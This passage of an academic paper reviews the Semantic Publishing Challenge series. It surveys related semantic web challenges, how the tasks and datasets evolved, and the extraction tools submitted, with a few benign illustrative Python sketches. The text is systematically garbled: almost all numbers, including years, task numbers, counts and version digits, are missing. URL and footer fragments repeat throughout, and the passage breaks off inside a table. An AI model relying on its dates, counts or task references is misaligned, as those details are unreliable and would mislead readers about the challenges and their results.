to achieve that, we validated the generalizability of our lessons learned against the other semantic web evaluation challenges ( semantic web evaluation challenges, http: // .eswc-conferences.org/important-dates/call-challenges.html, semantic web evaluation challenges, http:// .eswc-conferences.org/call-challenges, semantic web evaluation challenges, http:// .eswc-conferences.org/call-challenges). we concluded that our lessons learned are applicable to other challenges too; thus they can be considered best practices for organizing a challenge. other challenge organizers may benefit from relying on these best practices when organizing their own challenge. additionally, we thoroughly analyze and report best practices followed by the linked data that the solutions to our challenge’s tasks produce. our study of the different solutions provides insights regarding different approaches that address the same task, namely it acts as if the challenge benchmarks those different solutions against a common problem. last, we assess based on the produced datasets how the challenge organization reinforces increasing linked data quality in respect to the different linked data dimensions identified by zaveri et al. ( ). thus, besides the scholarly community and the ceur-ws.org open access repository, which is the owner of the underlying data, the broader linked data community may benefit from looking into our cumulative results. other linked data owners may find details on different approaches dealing with the same problem and the corresponding results they produce. taking them into consideration, they can determine their own approach for an equivalent case or even consider launching a corresponding challenge to determine the best performing tool with respect to the desired results and consider this one for their regular long term use. moreover, other linked data publishers may advise the results or consider the best practices as their guidelines for improving their tools and thus their results. in summary, our contributions are: • an outline of challenges organized in the field of linked data and semantic web technologies, • an exhaustive analysis of all solutions to every task of all editions of the semantic publishing challenge series, • a systematic discussion of lessons that we have learned from organizing the semantic publishing challenge, and • a structured set of best practices for organizing similar challenges, resulting from validating our lessons against other semantic web evaluation challenges. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http:// .eswc-conferences.org/important-dates/call-challenges.html http:// .eswc-conferences.org/important-dates/call-challenges.html http:// .eswc-conferences.org/call-challenges http:// .eswc-conferences.org/call-challenges http://dx.doi.org/ . /peerj-cs. the remainder of the paper is structured as follows: ‘background and related work’ section reviews related work; in particular it sets the background for our study by recapitulating the semantic publishing challenges run so far and comparing them to related challenges. ‘best practices for challenge organization’ section revisits the lessons learned, taking into consideration all three editions, validates them against other challenges and concludes in best practices for organizing such challenges. ‘challenge solutions analysis’ section exhaustively and cumulatively analyses the solutions submitted to all tasks of all challenges in the series. 
‘discussion: challenge impact on linked data quality’ section reviews the semantic publishing challenges as a means of assessing the quality of data, and ‘conclusions’ section summarizes our conclusions. background and related work this section sets the background of the semantic publishing challenges so far. ‘state of the art on previously organized challenges’ section summarizes other challenges, mainly those run in the semantic web community. then, ‘semantic publishing challenge: – ’ section recapitulates the semantic publishing challenges run so far, including the definitions of their tasks, and their outcomes. state of the art on previously organized challenges several related challenges were organized in the past for different purposes and application domains. in this section, we summarize the most well-known, long-lasting and closely related challenges in the semantic web field. where applicable, we report on systematic reviews of challenges for lessons learned. ontology matching challenges the ontology matching challenges (http://ontologymatching.org/) have been organized since by the ontology alignment evaluation initiative (oaei, http://oaei. ontologymatching.org/) and co-located with several top information systems and web conferences such as www (world wide web conferences, https://en.wikipedia.org/ wiki/international_world_wide_web_conference) or vldb (very large databases conferences, https://en.wikipedia.org/wiki/vldb). it aims to forge a consensus for evaluating the different emerging methods for schema or ontology matching. the oaei aims to assess the strengths and weaknesses of alignment/matching systems, compare the performance of techniques, and improve evaluation techniques to help improving the work on ontology alignment/matching through evaluating the techniques’ performances. following a similar structure as the semantic publishing challenge, the oaei challenge provides a list of test ontologies as training datasets. the seals infrastructure (http: //oaei.ontologymatching.org/ /seals-eval.html) to evaluate the results has been made available since . the results are presented during the ontology matching workshop, which is usually co-located with the international semantic web conference (iswc, http://swsa.semanticweb.org/content/international-semantic-web-conference-iswc). the tests and results of the challenge are published for further analysis. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ontologymatching.org/ http://oaei.ontologymatching.org/ http://oaei.ontologymatching.org/ https://en.wikipedia.org/wiki/international_world_wide_web_conference https://en.wikipedia.org/wiki/international_world_wide_web_conference https://en.wikipedia.org/wiki/vldb http://oaei.ontologymatching.org/ /seals-eval.html http://oaei.ontologymatching.org/ /seals-eval.html http://swsa.semanticweb.org/content/international-semantic-web-conference-iswc http://dx.doi.org/ . /peerj-cs. semantic web challenge the semantic web challenge (http://challenge.semanticweb.org/) aims to apply semantic web techniques in building online end-user applications that integrate, combine and deduce information needed to assist users in performing tasks. it features a track about big data designed to demonstrate approaches which can work on web scale using realistic web-quality data. the big data track, formerly known as the billion triples challenge (btc), started from mostly co-located with iswc. 
the billion triples challenge aimed to demonstrate the capability of semantic web technologies to process very large and messy data as typically found on the web. the track was renamed to ‘‘big data track’’ because very large data sets are now ubiquitous and the competition was opened to broader range of researchers dealing with their own big data. the functionality of submitted solutions is open but, to address real scalability issues, it forces all participants to use a specific billion triple challenge dataset provided by the challenge’s organizers. question answering over linked data (qald) the question answering over linked data (qald) challenge (http://qald.sebastianwalter. org/) (lopez et al., ; unger et al., ) focuses on answering natural language or keyword-based questions over linked datasets. co-located with the eswc semantic web conference (eswc, http://eswc-conferences.org/) in its first two editions in and , it moved to the conference and labs of the evaluation forum (clef, https://en.wikipedia.org/wiki/conference_and_labs_of_the_evaluation_forum) for the three following editions, to return to eswc as a part of its semantic web evaluation challenges track explained below. in all editions, a set of up to questions over dbpedia (https://dbpedia.org) served as input; participants were expected to answer these questions. the – editions had a task on multilingual questions, while from , a task on hybrid question answering over rdf and free text was added. some editions considered alternative datasets, e.g., about drugs or music, and had alternative sub-tasks on answering questions over interlinked datasets or finding lexicalizations of ontological terms. only few submitted solutions address the question/answering issues over a distributed and large collection of interconnected datasets. the first two editions of the qald challenge were reviewed (lopez et al., ); similarly to our work, this review ‘‘discuss[es] how the second evaluation addressed some of the issues and limitations which arose from the first one, as well as the open issues to be addressed in future competitions’’. like us, lopez et al. present the definition of the qald challenge’s tasks and the datasets used, and draw conclusions for the subsequent evaluation of question answering systems from reviewing concrete results of the first two challenge editions. their review of related work includes a review of methods for evaluating question answering systems, whereas the semantic publishing challenge was created to address the lack of such methods for evaluating semantic publishing tools (cf. ‘semantic publishing challenge: – ’). we additionally present lessons learned for challenge organization (‘best practices for challenge organization’) and about semantic publishing tools (‘challenge solutions analysis’), which, together, constitute the main contribution of this paper. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://challenge.semanticweb.org/ http://qald.sebastianwalter.org/ http://qald.sebastianwalter.org/ http://eswc-conferences.org/ https://en.wikipedia.org/wiki/conference_and_labs_of_the_evaluation_forum https://dbpedia.org http://dx.doi.org/ . /peerj-cs. lak challenges the learning analytics and knowledge challenges (lak challenges; see http://meco.l s. uni-hannover.de: /wp /?page_id= ) use a specific dataset of structured metadata from research publications in the field of learning analytics. 
the challenge was organized in for the first time and has so far continued yearly with the lak conference. beyond merely publishing the data, the lak challenges encourage its innovative use and exploitation. participants submit a meaningful use case of the dataset in the scope of six topic categories, such as comparison of the lak and edm (educational data mining) communities, innovative applications to explore, navigate and visualize, enrichment of the dataset, and usage of the dataset in recommender systems. considering that a lot of information is still available only in textual form, the submitted approaches can not only deal with the specific character of structured data. the aim for further challenges is to combine solutions for processing both structured and unstructured information from distributed datasets. linkedup the linkedup challenge was run by the linkedup project (linking data for education, http: //linkedup-project.eu/) since . the main purpose of the project was to push educational organizations to make their data publicly available on the web. one of the activities towards this purpose was to organize the linkedup challenge. the three editions of the challenge focused on three different levels of maturity: demo prototypes and applications, innovative tools and applications, and mature data-driven applications. participants were asked to submit demos of tools that analyze and/or integrate open web data for educational purposes. for all the above challenges, the participants were asked to submit a scientific paper along with their tool and dataset. d’aquin et al. ( ) present lessons learned from the linkedup project (linking web data for education). however, their paper provides a summary of the outcomes of the project, including a summary of the linkedup challenge, rather than a systematically structured account of lessons learned. dialog state tracking challenge (dstc) the challenge series review that is most closely related to ours in its methodology has been carried out by williams, raux & henderson ( ) over a challenge series from a field of computer science that is related to semantics but not to the web: the dialog state tracking challenge (dstc, http://workshop.colips.org/dstc /) on ‘‘correctly inferring the state of [a] conversation [...] given all of the dialog history’’. like our review, the one of dstc is based on three editions of a challenge, each of which built on its predecessor’s results, and it presents the definition of the challenge’s tasks and the datasets used. like we do in ‘challenge solutions analysis’ section, they provide a structured overview of the submissions to the dstc challenges. however, the focus of their review is on the evolution of tools in their domain of dialog state tracking, whereas our review additionally covers lessons learned for challenge design (cf. ‘best practices for challenge organization’), besides tools in the domain of semantic publishing. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://meco.l s.uni-hannover.de: /wp /?page_id= http://meco.l s.uni-hannover.de: /wp /?page_id= http://linkedup-project.eu/ http://linkedup-project.eu/ http://workshop.colips.org/dstc / http://dx.doi.org/ . /peerj-cs. table semantic web evaluation challenges. 
the table lists, for each semantic web evaluation challenge, its abbreviation, full name and the years in which it ran: sempub, the semantic publishing challenge; clsa, the (concept-level) sentiment analysis challenge; recsys, the linked open data-enabled recommender system challenge; oke, the open knowledge extraction challenge; saq, the schema-agnostic queries over linked data challenge; qald, the open challenge on question answering over linked data; and top-k, the top-k shortest path in large typed rdf graphs challenge. other related works there are further related works and challenges that we consider out of scope, as they are not focused on linked data sets. for example, the ai mashup challenge (http://aimashup.org/), part of the eswc conference, focused on innovative mashups, i.e., web applications combining multiple services and datasets, which were evaluated by a jury. information retrieval campaigns are a series of comparative evaluation methods that originate from the s and are used to compare various retrieval strategies or systems. as an example of such campaigns, semeval (semantic evaluation, http://alt.qcri.org/semeval /) is an ongoing series of evaluations of computational semantic analysis systems with a focus on textual similarity, question answering and sentiment analysis (clough & sanderson, ). the computational linguistics scientific document summarization shared task (cl-scisumm, http://wing.comp.nus.edu.sg/cl-scisumm /) is based on a corpus of annotated documents; its tasks focus on correctly identifying the underlying text that a summary refers to, but also on generating summaries. semantic web evaluation challenges the semantic web evaluation challenges, including our semantic publishing challenge, aim at developing a set of common benchmarks and establishing evaluation procedures, tasks and datasets in the semantic web field. they are organized as an official track of the eswc semantic web conference, which introduces common standards for its challenges, e.g., common deadlines for publishing the training and evaluation datasets. the purpose of the challenges is to showcase methods and tools on tasks common to the semantic web and adjacent disciplines, in a controlled setting involving rigorous evaluation. each semantic web evaluation challenge is briefly described here and all of them are summarized in the table above. concept-level sentiment analysis challenge. the concept-level sentiment analysis challenge (clsa) focuses on semantics as a key factor for detecting the sentiment of a text, rather than just performing a lexical analysis of text; cf. reforgiato recupero & cambria ( ) and reforgiato recupero, dragoni & presutti ( ). participants are asked to use semantic web technology to improve their sentiment analysis system and to measure the performance of the system within the sentiment analysis track of the semeval workshop (http://alt.qcri.org/semeval /task /). an automatic evaluation tool (eswc-clsa, https://github.com/diegoref/eswc-clsa) was applied to the submissions; it was made available to the participants before their submission. in the second edition, participants were asked to submit a concept-level sentiment analysis engine that exploited linked datasets such as dbpedia.
linked open data-enabled recommender systems challenge. the linked open data-enabled recommender systems challenge (di noia, cantador & ostuni, ) was designed with two main goals: (i) establish links between the two communities of recommender systems and semantic web, and (ii) develop content-based recommendation systems using interlinking and other semantic web technologies. the first edition featured three independent tasks related to a book recommendation use case. while the first edition was successful, the second edition was canceled because it had no participants. open knowledge extraction challenge. the open knowledge extraction challenge (oke) focuses on content extraction from textual data using linked data technology (nuzzolese et al., ). the challenge was divided into two sub-tasks (oke challenge, https://github.com/anuzzolese/oke-challenge- #tasks-overview) focusing on entity recognition and entity typing. the participants of the challenge were the developers of four different well-known systems in this community. the three defined tasks focused on (a) entity recognition, linking and typing for knowledge base population, (b) entity typing for vocabulary and knowledge base enrichment, and (c) web-scale knowledge extraction by exploiting structured annotation. the submissions were evaluated using two different methods: (i) using datasets for training purposes and for evaluating the performance of the submitted approaches, and (ii) establishing an evaluation framework to measure the accuracy of the systems. the applications of tasks and were published as web services with input/output provided in the nlp interchange format (nif, http://persistence.uni-leipzig.org/nlp rdf/). schema-agnostic queries over linked data challenge. the schema-agnostic queries over linked data challenge (saq) was designed to invite schema-agnostic query approaches and systems (freitas & unger, ). the goal of this challenge is to improve querying approaches over complex databases with large schemata and to relieve users from the need to understand the database schema. tasks were defined for two types of queries: schema-agnostic sparql queries and schema-agnostic keyword-based queries. participants were asked to submit the results together with their approach without changing the query syntax but with different vocabularies and structural changes. a gold standard dataset was used to measure precision, recall and f-score. semantic publishing challenge: – in this section, we briefly summarize the history of the semantic publishing challenge to provide the necessary background for the following discussion. more detailed reports for each edition have been published separately by lange & di iorio ( ), di iorio et al. ( ) and dimou et al. ( ). we sought a way to challenge the semantic publishing community to accomplish tasks whose results could be compared in an objective way. after some preliminary discussion, we focused on information extraction tasks. the basic idea was to provide as input some scholarly papers, in multiple formats, and some queries in natural language. participants were asked to extract data from these papers and to publish them as an rdf dataset that could be used to answer the input queries.
the best performing approach was identified automatically by comparing the output of the queries in the produced datasets against a gold standard, and by measuring precision and recall. our selection of queries was motivated by quality assessment scenarios complementary to the traditional metrics based on counting citations: how the extracted information can serve as an indicator for the quality of scientific output such as publications or events. the same motivation, structure and evaluation procedure have been maintained in the following years, with some improvements and extensions. all of the challenge series' tasks (see the 'tasks evolution' section), the input to the tasks, namely the training and evaluation datasets (see the 'input: training and evaluation datasets' section), the output, namely the submitted solutions and the produced datasets (see the 'output: solutions and datasets produced' section), and how their evaluation was conducted (see the 'tasks evaluation' section) are briefly explained below. tasks evolution table summarizes the tasks' full history. for each year and each task, we highlight the data source and the format of the input files, along with a short description of the task and a summary of the participation. edition tasks. the first edition had two main tasks (task and task ) and an open task (task ; see lange & di iorio ( ) for full details and statistics of this challenge's edition). for task , the participants were asked to extract information from selected ceur-ws.org workshop proceedings volumes to enable the computation of indicators for the workshops' quality assessment. the input files were html tables of contents using different levels of semantic markup, as well as pdf full text. the participants were asked to answer twenty queries. for task , the input dataset included xml-encoded research papers, derived from the pubmedcentral and pensoft open access archives. the participants were asked to extract data about citations to assess the value of articles, for instance by considering citations' position in the paper, their co-location with other citations, or their purpose. in total, they were asked to answer ten queries. dataset and queries were completely disjoint from task . after circulating the call for submissions, we received feedback from the community that mere information extraction, even if motivated by a quality assessment use case, was not the most exciting task related to the future of scholarly publishing, as it assumed a traditional publishing model. therefore, to address the challenge's primary target, i.e., 'publishing' rather than just 'metadata extraction', we widened the scope by adding an open task (task ). participants were asked to showcase data-driven applications that would eventually support publishing. we received a good number of submissions; winners were selected by a jury. table semantic publishing challenge evolution from to .
the table summarizes, for each of the three editions, the tasks, their data sources and input formats, the submitted solutions and the awards: task , extracting data on workshops' history and participants in all three editions, with ceur-ws.org proceedings volumes as source, html and pdf input in the first edition and html afterwards, and awards for best performance and innovation (decided by the chairs' assessment in the later editions); task , extracting data on citations in the first edition, on citations, affiliations and fundings in the second, and on internal structure, affiliations and fundings in the third, with pubmed xml as source in the first edition and ceur-ws.org pdf afterwards, and awards for best performance and most innovative solution (chairs' assessment); task , an open task showcasing semantic publishing applications in the first edition (most innovative award, jury assessment), and interlinking cross-dataset (and later cross-task) entities in the following editions, using ceur-ws.org, colinda, dblp, springer ld, lancet and swdf as sources and rdf as format. edition tasks. in we were asked to include only tasks that could be evaluated in a fully objective manner, and thus we discarded the edition's open task (task ). while task queries remained largely stable from to , the queries for task changed. we transformed task into a pdf mining task, instead of xml, and thus moved all pdf-related queries there. the rationale was to differentiate tasks on the basis of the competencies and tools required to solve them. since the input format was completely new and we expected different teams to participate (as actually happened), we wanted to explore new areas and potentially interesting information. in fact, we asked participants to extract data not only on citations but also on affiliations and fundings. the number of queries remained unchanged (ten in total). we also decided to use the same data source for both tasks, and to make them interplay. ceur-ws.org data has become the central focus of the whole challenge, for two reasons: on the one hand, the data provider (ceur-ws.org) takes advantage of a broader community that builds on its data, which, before the semantic publishing challenges, had not been available as linked data. on the other hand, data consumers gain the opportunity to assess the quality of scientific venues by taking a deeper look into their history, as well as the quality of the publications. (on a more pragmatic level, a further reason was that one of the challenge organizers, christoph lange, has been technical editor of ceur-ws.org since and thus has (i) the mandate to advance this publication service technically, and (ii) a deep understanding of the data.) in , we also introduced a new task . instead of being an open task, task was focused on interlinking the dataset produced by the winners of task from the edition of the semantic publishing challenge with related datasets in the linked data cloud. edition tasks. the tasks of the edition were designed to ensure continuity and to allow previous participants to use and refine their tools. in particular, task was unchanged except for some minor details on queries. task was still on pdf information extraction but queries were slightly changed: considering the interest and results of the participants in the past, we did not include citations any more. rather, we added some queries on the identification of the structural components of the papers (table of contents, captions, figures and tables) and maintained queries on funding agencies and projects. in total, we had ten queries in as well. task remained the same but it was repurposed.
instead of only aiming for cross-dataset links between the dataset produced by the task winners of the previous edition of the challenge and other, external datasets, task now focused on interlinking the datasets produced by the winners of task and task of the edition. thus, the task aimed not only at cross-dataset but also at cross-task links: the goal was to link entities identified in the ceur-ws.org website with the same entities that were extracted from the proceedings papers. moreover, the number of external datasets was reduced. input: training and evaluation datasets in this section we give an overview of the datasets used for the above-mentioned tasks. these datasets were incrementally refined and, as discussed below in 'dataset continuity', some valuable indications can be taken from their analysis. for each task, and for each year, we published two datasets: (i) a training dataset (td) on which the participants could test and train their extraction tools and (ii) an evaluation dataset (ed) made available a few days before the final submission and used as input for the final evaluation. training and evaluation dataset for task . the ceur-ws.org workshop proceedings volumes served as the source for selecting the training and evaluation datasets of task in all challenge editions. in this data source, which included data spanning over years, workshop proceedings volumes were represented in different formats and at different levels of encoding quality and semantics. an html main index page (ceur-ws, http://ceur-ws.org/) links to all workshop proceedings volumes, which have html tables of contents and contain pdf or postscript full texts. a mixture of different html formats (no semantic markup at all, different versions of microformats, rdfa) was chosen for both the training and evaluation datasets. the training dataset comprised all volumes of several workshop series, including, e.g., the linked data on the web workshop at the www conference, and all workshops of some conferences, e.g., of several editions of eswc. in and , the evaluation dataset was created by adding further workshops on top of the training dataset. to support the evolution of extraction tools, the training datasets of and were based on the unions of the training and evaluation datasets of the previous years. in and , the task dataset of the previous year served as an input to task . training and evaluation dataset for task . in , the datasets for task included xml files encoded in jats (http://jats.nlm.nih.gov/) and taxpub (https://github.com/plazi/taxpub), an official extension of jats customized for taxonomic treatments (catapano, ). the training dataset consisted of files from journals, while the evaluation dataset included papers and was a superset of the training dataset. in , we switched to pdf information extraction: the training dataset included papers taken from some of the workshops analyzed in task , while the evaluation dataset included papers from randomly selected workshops (uniform with the training dataset). in , we reduced the number of papers while increasing the cases for each query. thus, we included pdf papers in the training and in the evaluation dataset. again, the papers were distributed in the same way and used different styles for headers, acknowledgments and structural components.
training and evaluation dataset for task . the training dataset for task consists of the ceur-ws.org dataset produced by the winning tool of task (ceur-ws dataset, https://github.com/ceurws/lod/blob/master/data/ceur-ws.ttl), colinda (http://www.colinda.org/), dblp (http://dblp.l s.de/dblp++.php), lancet (http://www.semanticlancet.eu/), swdf (http://data.semanticweb.org/), and springer ld (http://lod.springer.com/) in , and of the ceur-ws.org datasets produced by the winning tools of task (http://rml.io/data/spc /ceur-ws/ceur-wstask .rdf.gz) and task (http://rml.io/data/spc /ceur-ws/ceur-wstask .rdf.gz), colinda, dblp, and springer ld in . output: solutions and datasets produced there were four distinct solutions in total for task during the three editions of the challenge, eight distinct solutions in total for task , and none for task during the last two editions. all solutions for each task are briefly summarized here. task . there were four distinct solutions proposed to address task in the and editions of the challenge. three participated in both editions, whereas the fourth solution participated only in . all solutions are briefly introduced here and summarized in tables – : one table provides details about the methodologies, approach and implementation each solution followed; another summarizes the model and vocabularies/ontologies each solution used (both for task and task ); another provides statistics regarding the dataset schema/entities and triples/size each solution produced (again both for task and task ); and the last ones summarize the data model each solution considered and the number of instances extracted and annotated per concept for each solution. solution . . kolchin et al. ( ) and kolchin & kozlov ( ) presented a case-specific, crawling-based approach for addressing task . it relies on an extensible, template-dependent crawler that uses sets of special predefined templates based on xpath and regular expressions to extract the content from html and convert it into rdf. the rdf is then processed to merge resources using fuzzy matching. the use of the crawler makes the system tolerant to invalid html pages. this solution improved its precision in , as well as the richness of its data model.
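to give a flavour of what such template-dependent extraction looks like in practice, the following is a minimal, illustrative python sketch (it is not kolchin et al.'s actual crawler): a predefined template pairs xpath expressions with property names, and a regular expression post-processes one of the extracted values; the example html, the template and the property names are all hypothetical.

    # illustrative sketch of template-dependent extraction: xpath plus a regular
    # expression turned into simple subject-predicate-object triples.
    # the template, the example html and the property names are hypothetical;
    # this is not the actual crawler of the solution described above.
    import re
    from lxml import html

    PAGE = """<html><body>
      <h1>proceedings of the example workshop (exw 2015)</h1>
      <ul><li><a href="paper1.pdf">a paper title</a></li></ul>
    </body></html>"""

    TEMPLATE = {                                  # predefined, volume-specific template
        "volumeTitle": "//h1/text()",
        "paperTitle": "//li/a/text()",
    }
    ACRONYM_RE = re.compile(r"\(([a-z]+)\s+(\d{4})\)")   # e.g. "(exw 2015)"

    def extract(page_html, volume_iri):
        tree = html.fromstring(page_html)
        triples = []
        for prop, xpath in TEMPLATE.items():
            for value in tree.xpath(xpath):
                triples.append((volume_iri, prop, value.strip()))
        # regex post-processing of the volume title to split acronym and year
        match = ACRONYM_RE.search(tree.xpath(TEMPLATE["volumeTitle"])[0])
        if match:
            triples.append((volume_iri, "acronym", match.group(1)))
            triples.append((volume_iri, "year", match.group(2)))
        return triples

    print(extract(PAGE, "http://example.org/Vol-1"))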
the first of the tables mentioned above (task solutions: their primary analysis methods, methodologies, implementation basis and evaluation results) can be summarized as follows: solution . (kolchin et al.; kolchin & kozlov) follows a crawling method, is case-specific and template-based, and is implemented in python with xpath rules under an mit license; solution . (heyvaert et al.; dimou et al.) is a generic solution for abstracted mappings, implemented on top of rml in java with rml and css rules, also under an mit license; solution . (ronzano et al.; ronzano, del bosque & saggion) performs linguistic and structural analysis, is partly case-specific and relies on nlp/ner, implemented on top of gate in java with jape rules; solution . (milicka & burget) performs visual layout and multi-aspect content analysis, implemented on top of fitlayout in java and html with html/css rules, under a gpl license. the table also reports each solution's precision and recall improvements and whether it was awarded best performing or most innovative. solution . . heyvaert et al. ( ) and dimou et al. ( ) exploited a generic tool for generating rdf data from heterogeneous data. it uses the rdf mapping language (rml, http://rml.io) to define how data extracted from ceur-ws.org web pages should be semantically annotated. rml extends r rml (https://www.w .org/tr/r rml/) to express mapping rules from heterogeneous data to rdf. css selectors (https://www.w .org/tr/selectors/) are used to extract the data from the html pages. the rml mapping rules are parsed and executed by the rml processor (https://github.com/rmlio/rml-mapper). in , the solution reconsidered its data model and was extended to validate both the mapping documents and the final rdf, resulting in a dataset of overall improved quality. solution . . ronzano et al. ( ) and ronzano, del bosque & saggion ( ) designed a case-specific solution that relies on chunk-based and sentence-based support vector machine (svm) classifiers, which are exploited to semantically characterize parts of ceur-ws.org proceedings' textual contents. thanks to a pipeline of text analysis components based on the gate text engineering framework (gate, https://gate.ac.uk/), each html page is characterized by structural and linguistic features; these features are then exploited to train the classifiers on the ground truth provided by the subset of ceur-ws.org proceedings with microformat annotations. a heuristic-based annotation sanitizer is applied to fix classifier imperfections and interlink annotations. the produced dataset is also extended with information retrieved from external resources. a further table (task and solutions: the vocabularies used to annotate the data) lists the vocabularies each solution used, including bibo, the collections ontology (co), dbo, dc and dcterms, the event ontology, foaf, schema.org, skos, the spar ontologies (biro, cito, doco, fabio, frapo, frbr, pro), swc, swrc, the timeline ontology, vcard, and custom vocabularies.
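the rml-based solution described above declaratively couples css selectors with mapping rules that state how the selected html content becomes rdf. as a rough, hypothetical illustration of that idea (using beautifulsoup and rdflib rather than the actual rml processor, with made-up classes and properties), a mapping rule here is simply a (css selector, class, property) triple:

    # minimal sketch of css-selector-driven html-to-rdf mapping, in the spirit of
    # the rml-based solution above but expressed imperatively; the namespace, the
    # classes and the properties are made up for the example.
    from bs4 import BeautifulSoup
    from rdflib import Graph, Literal, Namespace, URIRef
    from rdflib.namespace import RDF

    PAGE = """<html><body>
      <h1 class="title">proceedings of the example workshop</h1>
      <li class="paper"><a href="paper1.pdf">a paper title</a></li>
    </body></html>"""

    EX = Namespace("http://example.org/")
    RULES = [                                   # (css selector, rdf class, rdf property)
        ("h1.title", EX.Proceedings, EX.title),
        ("li.paper a", EX.Paper, EX.title),
    ]

    graph = Graph()
    soup = BeautifulSoup(PAGE, "html.parser")
    for rule_index, (selector, rdf_class, rdf_property) in enumerate(RULES):
        for node_index, node in enumerate(soup.select(selector)):
            subject = URIRef(f"http://example.org/resource/{rule_index}-{node_index}")
            graph.add((subject, RDF.type, rdf_class))
            graph.add((subject, rdf_property, Literal(node.get_text(strip=True))))

    print(graph.serialize(format="turtle"))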
solution . . milicka & burget ( ) presented an application of the fitlayout framework (http://www.fit.vutbr.cz/~burgetr/fitlayout/). this solution participated in the semantic publishing challenge only in . it combines different page analysis methods, i.e., layout analysis and visual and textual feature classification, to analyze the rendered pages rather than their code. the solution is quite generic but requires domain/case-specific actions in certain phases (model building step). three further tables report statistics for the task solutions of the and editions: one on the model, i.e., the classes each solution used to represent conferences (e.g., swc:organizedevent, swrc:conference, swrc:conferenceevent, bibo:conference), workshops (e.g., bibo:workshop, swrc:workshop, swrc:section, swc:event), proceedings (e.g., swrc:proceedings, bibo:proceeding, bibo:volume), papers (e.g., swrc:inproceedings, swrc:publication, swc:paper, bibo:article, foaf:document) and persons (foaf:person or foaf:agent); one on the number of entities extracted per concept (conferences, workshops, proceedings, papers, persons) by each solution; and one on the produced datasets, i.e., their size and their numbers of triples, entities, properties and classes. task . there were eight distinct solutions proposed to address task in the and editions of the challenge. three participated in both editions, three only in and two only in . as the definition of task changed fundamentally from to , the only solution submitted for task in (bertin & atanassova, ) is not comparable to the and solutions and is therefore not discussed here. all solutions for task , except for the one of , are briefly introduced here and summarized in tables – : two tables provide details about the methodologies and approach each solution followed, another summarizes details regarding the implementation and the components each solution employed to address task , another summarizes the model and vocabularies/ontologies each solution used (both for task and task ), and another provides statistics regarding the dataset schema/entities and triples/size each solution produced (again both for task and task ). solution . . tkaczyk & bolikowski ( ) relied on cermine (http://cermine.ceon.pl/), an open source system for extracting structured metadata and references from scientific publications published as pdf files.
it has a loosely coupled architecture and a modular workflow based on supervised and unsupervised machine-learning techniques, which simplifies the system's adaptation to new document layouts and styles. it employs an enhanced docstrum algorithm for page segmentation to obtain the document's hierarchical structure, support vector machines (svm) to classify its zones, heuristics and regular expressions for individual fields, and conditional random fields (crf) for affiliation parsing, thus identifying organization, address and country within affiliations. last, k-means clustering was used for reference extraction, to divide reference zones into individual reference strings. (a further table reports statistics about the datasets produced by the task solutions in the and editions: dataset size and numbers of triples, entities and properties per solution.) solution . . klampfl & kern ( ) and klampfl & kern ( ) implemented a processing pipeline that analyzes a pdf document's structure incorporating a diverse set of machine learning techniques. to be more precise, they employ unsupervised machine learning techniques (a merge-and-split algorithm) to extract text blocks, and supervised ones (max entropy and beam search) to extend the document's structure analysis and identify sections and captions. they combine the above with clustering techniques to obtain the article's hierarchical table of contents and classify blocks into different metadata categories. heuristics are applied to detect the reference section, and sequence classification is used to categorize the tokens of individual references into strings. last, named entity recognition (ner) is used to extract references to grants, funding agencies, projects, and figure and table captions. solution . . nuzzolese, peroni & reforgiato recupero ( ) and nuzzolese, peroni & recupero ( ) relied on the metadata and citations jailbreaker (macja) in , which was extended to the article content miner (acm) in . the tool integrates hybrid techniques based on natural language processing (nlp: combinatory categorial grammar, discourse representation theory, linguistic frames), discourse reference extraction and linking, and topic extraction. it also employs heuristics to exploit existing lexical resources and gazetteers to generate representation structures. moreover, it incorporates fred (http://wit.istc.cnr.it/stlab-tools/fred), a novel machine reader, and includes modules to query external services to enhance and validate data. solution . . sateli & witte ( ) and sateli & witte ( ), relying on lodexporter (http://www.semanticsoftware.info/lodexporter), proposed an iterative, rule-based pattern matching approach. the system is composed of two modules: (i) a text mining pipeline based on the gate framework that extracts structural and semantic entities, leveraging existing ner-based text mining tools and employing post-processing heuristics to detect or correct the authors' affiliations in a fuzzy manner, and (ii) a lod exporter that translates the document annotations into rdf according to custom rules.
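as an illustration of the kind of supervised zone classification mentioned above (assigning pdf text zones to metadata categories), the following toy python sketch trains an svm on a few hand-made layout features and predicts the category of a new zone; the features, labels and parameters are invented for the example and do not reproduce cermine's actual models:

    # toy illustration of supervised zone classification for pdf metadata extraction;
    # the features, labels and parameters are invented and do not reproduce any actual system.
    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import StandardScaler
    from sklearn.svm import SVC

    # hypothetical features per zone: [relative y position, font size, digit ratio, token count]
    X_train = [
        [0.05, 18.0, 0.00, 12],    # title-like zone
        [0.10, 10.0, 0.05, 25],    # author/affiliation-like zone
        [0.50, 9.0, 0.02, 180],    # body-text zone
        [0.95, 8.0, 0.30, 40],     # references zone
    ]
    y_train = ["title", "affiliation", "body", "references"]

    model = make_pipeline(StandardScaler(), SVC(kernel="rbf", C=10.0))
    model.fit(X_train, y_train)

    new_zone = [[0.08, 17.5, 0.00, 10]]
    print(model.predict(new_zone))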
a further table (task solutions: their primary analysis methods, their methodologies in general as well as with respect to extraction, text recognition and use of machine learning techniques, and evaluation results) compares the eight task solutions: for each solution (tkaczyk & bolikowski; klampfl & kern; nuzzolese, peroni & recupero and nuzzolese, peroni & reforgiato recupero; sateli & witte; kovriguina et al.; ronzano et al.; ahmad, afzal & qadir; ramesh et al.) it records the primary analysis method (structure-based, linguistic-based or presentation-based), the workflow (parallel pipelines, a single pipeline, an iterative approach or a layered approach), the use of external services, the extraction route (pdf-to-xml, pdf-to-html or pdf-to-text), the machine learning techniques employed (supervised, unsupervised, crf), the text recognition techniques employed (nlp/ner, heuristics, regular expressions), and the evaluation outcome (best performing or most innovative). another table (task solutions: how they address different subtasks to accomplish task ) lists, for each subtask, the technique each solution applies: document structure (e.g., an enhanced docstrum; max entropy, merge and split, and clustering; nlp to break the text down into sections and sentences; spans between gazetteer segment headers; font characteristics and text position; rule-based iterative pdf analysis; heuristics on titles, capitalization and style; crf); fragment classification (e.g., svm, supervised ml, stanford corenlp and nltk, gazetteers, font-based blocks and sorting, structural features with chunk- and sentence-based svm, pattern matching, crf); authors and affiliations (e.g., svm (libsvm) and crf, unsupervised ml and classification, heuristics with ner and corenlp, 